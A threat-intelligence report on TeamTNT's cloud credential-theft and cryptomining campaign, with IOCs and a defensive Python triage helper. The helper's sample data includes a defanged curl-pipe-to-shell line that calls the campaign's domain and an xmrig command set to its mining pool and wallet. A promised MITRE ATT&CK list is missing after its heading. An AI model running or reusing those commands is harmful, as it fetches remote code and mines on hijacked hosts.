Threat actors keep adapting their tooling to new platforms, and the group known as TeamTNT has been doing so against the major cloud providers: Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). This report summarizes TeamTNT’s cloud credential stealing campaign, drawing on reporting from Dark Reading, Trend Micro, and Cado Security.

The campaign, which targets AWS, Azure, and GCP for credential theft and cryptomining, has been active for several months. It has since expanded to exposed Docker services, consistent with TeamTNT’s established pattern of exploiting cloud misconfigurations and vulnerabilities rather than relying on a single flaw.

The campaign uses several techniques to steal cloud credentials and spread: the scripts profile the host, search the filesystem for credential files, and exfiltrate those files. They also collect the process environment variables, most likely to identify other services and credentials on the system that can be targeted later.

The threat actor is now delivering a UPX-packed, Golang-based ELF binary that drops and executes another shell script for scanning a specified range and propagating to other vulnerable targets.

The following Indicators of Compromise (IOCs) have been identified:

  • SHA-256 hashes:
    • 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae (IRC bot)
    • 3139a85a18e42bf60ba65deb3d691b5c088a0fac2b80a4d05f17a68eac3d4882 (Script)
    • 595497c407795e0dbb562a4616fd877ce1eb2e86424672bac8003662e1fa07eb (config_background.json)
    • 61fdad6d9b149e8d4fc54a848a25219eb9f1364a58073c27eadde8f8298a9573 (main shell script)
  • Monero Wallet ID: 89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq
  • Domain (defanged URL): hxxp://DonaldTrump[.]cc
  • Mining Pool: mine[.]c3pool[.]com:17777
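The following triage helper is an added example, not code from the report or from the vendors it cites. It folds the published IOCs into three checks a responder usually runs on a suspect host: hashing a file against the SHA-256 list, flagging ELF images that carry the UPX packer marker (the report describes a UPX-packed Golang ELF dropper), and scanning shell history or process listings for the defanged domain, the mining pool, and the wallet ID. The sample byte buffer and the sample command lines at the bottom are constructed for illustration; the `[.]` and `hxxp` handling assumes the usual defanging conventions shown in the IOC list.

```python
"""Triage helper built around the TeamTNT IOCs published in the report above.

Added example; the sample inputs below are constructed, not real artifacts.
"""
import hashlib

# SHA-256 IOCs copied from the report.
IOC_SHA256 = {
    "9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae": "IRC bot",
    "3139a85a18e42bf60ba65deb3d691b5c088a0fac2b80a4d05f17a68eac3d4882": "script",
    "595497c407795e0dbb562a4616fd877ce1eb2e86424672bac8003662e1fa07eb": "config_background.json",
    "61fdad6d9b149e8d4fc54a848a25219eb9f1364a58073c27eadde8f8298a9573": "main shell script",
}

# String IOCs copied from the report, stored in refanged form.
IOC_STRINGS = {
    "donaldtrump.cc": "domain",
    "mine.c3pool.com:17777": "mining pool",
    "89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq": "Monero wallet",
}


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an in-memory blob (read the file in binary mode first)."""
    return hashlib.sha256(data).hexdigest()


def match_hash(data: bytes):
    """Return the IOC label if the blob's SHA-256 is on the list, else None."""
    return IOC_SHA256.get(sha256_hex(data))


def is_upx_packed_elf(data: bytes) -> bool:
    """True for an ELF image that contains the 'UPX!' packer marker.

    UPX writes the marker into its own header blocks; searching the whole
    buffer keeps this a cheap triage check instead of a full format parse.
    A packed binary is a reason to look closer, not proof of malice.
    """
    return data[:4] == b"\x7fELF" and b"UPX!" in data


def refang(text: str) -> str:
    """Undo common defanging so the IOCs match live data as well as reports."""
    return (
        text.replace("[.]", ".")
        .replace("hxxps://", "https://")
        .replace("hxxp://", "http://")
    )


def scan_text(line: str) -> list:
    """Labels of every string IOC present in one line, in IOC_STRINGS order."""
    hay = refang(line).lower()
    return [label for needle, label in IOC_STRINGS.items() if needle.lower() in hay]


def triage(name: str, data: bytes, text_lines) -> dict:
    """Run all three checks on a file blob plus some text context (history,
    ps output, cron entries) and return a single result record."""
    hits = {}
    for idx, line in enumerate(text_lines):
        found = scan_text(line)
        if found:
            hits[idx] = found
    return {
        "file": name,
        "sha256": sha256_hex(data),
        "known_ioc": match_hash(data),
        "upx_packed_elf": is_upx_packed_elf(data),
        "text_hits": hits,
    }


# Constructed samples: a fake ELF header carrying the UPX marker, and a few
# shell-history style lines that mimic what a miner deployment leaves behind.
SAMPLE_PACKED_ELF = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"UPX!" + b"\x00" * 32
SAMPLE_LINES = [
    "xmrig -o mine.c3pool.com:17777 -u "
    "89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq",
    "curl -fsSL hxxp://DonaldTrump[.]cc/ | sh",
    "sudo systemctl restart docker",
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage("sample.bin", SAMPLE_PACKED_ELF, SAMPLE_LINES), indent=2))
```

On a live host, feed `triage()` the bytes of each suspect file and the contents of `~/.bash_history`, `ps -ef` output, and crontab entries; the constructed buffer above deliberately does not match any published hash, so `known_ioc` is `None` while `upx_packed_elf` is `True`, which is exactly the "look closer" case.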

The MITRE ATT&CK tactics associated with this campaign include:

The TeamTNT campaign is a significant threat to cloud workloads because it does not depend on a single exploit: misconfigurations such as exposed Docker services, together with credentials left on hosts, are enough. Its host profiling, credential file searching, and exfiltration underline the need for continuous monitoring of cloud environments and for keeping long-lived credentials off compute instances.

The IOCs listed above, together with the associated MITRE ATT&CK tactics, are directly usable for detection and response. Organizations should keep exposed services patched and off the public internet, rotate any credentials that may have been present on affected hosts, and apply the principle of least privilege so that a stolen credential yields as little as possible.

As threat actors keep refining their tooling, understanding campaigns like TeamTNT’s is essential for hardening cloud environments against the next one.